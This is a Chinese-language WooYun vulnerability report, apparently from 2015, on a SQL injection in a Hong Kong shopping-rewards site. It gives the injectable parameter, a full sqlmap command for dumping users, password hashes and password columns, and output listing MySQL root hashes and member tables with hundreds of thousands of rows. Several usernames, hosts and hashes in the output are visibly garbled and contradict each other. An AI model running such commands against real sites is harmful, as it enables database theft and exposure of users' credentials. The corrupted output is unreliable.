当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153411

漏洞标题:財富聯盟某處存在SQL插入攻擊(DBA權限;root密碼泄露;68萬系統日誌泄露)(香港地區)

相关厂商:財富聯盟

漏洞作者: 路人甲

提交时间:2015-11-11 10:25

修复时间:2015-11-24 07:18

公开时间:2015-11-24 07:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

财富联盟总部 香港沙田区汇达国际大厦701室 电话: 400-6969-185

详细说明:

地址:http://**.**.**.**/index.php?app=goods&id=10970

python sqlmap.py -u "http://**.**.**.**/index.php?app=goods&id=10970" -p id --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: aajflm
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| ecm_jflog               | 683675  |

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: app=goods&id=10970 AND 5156=5156
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user:    'root@localhopt'
current user is DBA:    True
database management system users [3]:
[*] '`oot'@'localhost'
[*] 'qoot'@'**.**.**.**'
[*] 'root'@'127\x1c0.0.1'
database management system users password hashes:
[*] root [2]:
    password hash: *4D264C92FC0238@364FA71BE2B02E197D1F99B91
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1A
Database: aajflm
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| ecm_jflog               | 683675  |
| ecm_shop_member         | 614218  |
| ecm_spreader_member     | 508214  |
| ecm_member              | 505737  |
| ecm_member_account      | 505560  |
| ecm_jflog2              | 440930  |
| ecm_member1             | 403599  |
| ecm_jflog_copy          | 225399  |
| ecm_zsjflog_copy        | 216122  |
| ecm_uploaded_file       | 47374   |
| ecm_cart                | 22750   |
| ecm_sessions_data       | 21511   |
| ecm_lottery             | 21318   |
| ecm_goods_order_1023    | 19449   |
| ecm_goods_order_1030    | 19395   |
| ecm_category_goods      | 18263   |
| ecm_goods_spec          | 17196   |
| ecm_goods_image         | 16548   |
| ecm_incomeshop          | 13301   |
| ecm_order_goods         | 12627   |
| ecm_goods_statistics    | 12463   |
| ecm_goods               | 12448   |
| ecm_order_log           | 12356   |
| ecm_incomelog           | 12082   |
| ecm_goods_order_ls      | 11635   |
| ecm_order_extm          | 10816   |
| ecm_poss                | 5428    |
| ecm_comment             | 4772    |
| ecm_address             | 4002    |
| ecm_region_old          | 3452    |
| ecm_region              | 3413    |
| ecm_poslog              | 3394    |
| ecm_region_line         | 3384    |
| ecm_myarea              | 3142    |
| ecm_financial           | 2909    |
| sj_member               | 2836    |
| ecm_goods_spec_images   | 2817    |
| ecm_message             | 2750    |
| ecm_shop_copy           | 2304    |
| ecm_gcategory           | 1853    |
| ecm_collect             | 1554    |
| ecm_cflog               | 1358    |
| ecm_shop_10yuan         | 1318    |
| ecm_user_cf             | 818     |
| ecm_goods_adv           | 807     |
| ecm_posmember           | 661     |
| ecm_region_bak          | 475     |
| ecm_jfrestrictlog       | 351     |
| ecm_proposal            | 312     |
| ecm_shop_bak            | 244     |
| ecm_recommended_goods   | 143     |
| ecm_ka_cart             | 114     |
| ecm_goods_qa            | 95      |
| ecm_user_priv           | 69      |
| ecm_shop_ka             | 67      |
| ecm_ka_order            | 66      |
| ecm_goods_cart          | 56      |
| ecm_category_store      | 53      |
| ecm_sales               | 52      |
| ecm_store               | 52      |
| ecm_jflog_bak           | 42      |
| ecm_spreader_member_bak | 40      |
| ecm_myprovince          | 34      |
| ecm_postal              | 34      |
| ecm_ukinds              | 28      |
| sj_level                | 14      |
| ecm_scategory           | 6       |
| ecm_withdrawals         | 6       |
| ecm_exchange            | 3       |
| ecm_recommend           | 3       |
| ecm_scope               | 2       |
| ecm_bankcard_record     | 1       |
| ecm_pos_shop            | 1       |
+-------------------------+---------+
Database: mysql
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| help_relation           | 1009    |
| help_topic              | 510     |
| help_keyword            | 453     |
| `user`                  | 3       |
+-------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: aajflm
Table: ecm_member
[2 columns]
+-----------+
| Column    |
+-----------+
| password  |
| tpassword |
+-----------+
Database: aajflm
Table: ecm_member1
[2 columns]
+-----------+
| Column    |
+-----------+
| password  |
| tpassword |
+-----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: mysql
Table: user
[3 entries]
+--------------------------------------------------+
| Password                                         |
+--------------------------------------------------+
| *4D064C92FC0238F364FA71BE2B02E197D1F99B91        |
| *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| *81F5E21E35407D883A6CD4A731AE@FB6AF209E1B        |
+--------------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-24 07:18

厂商回复:

最新状态:

暂无

漏洞评价:

评价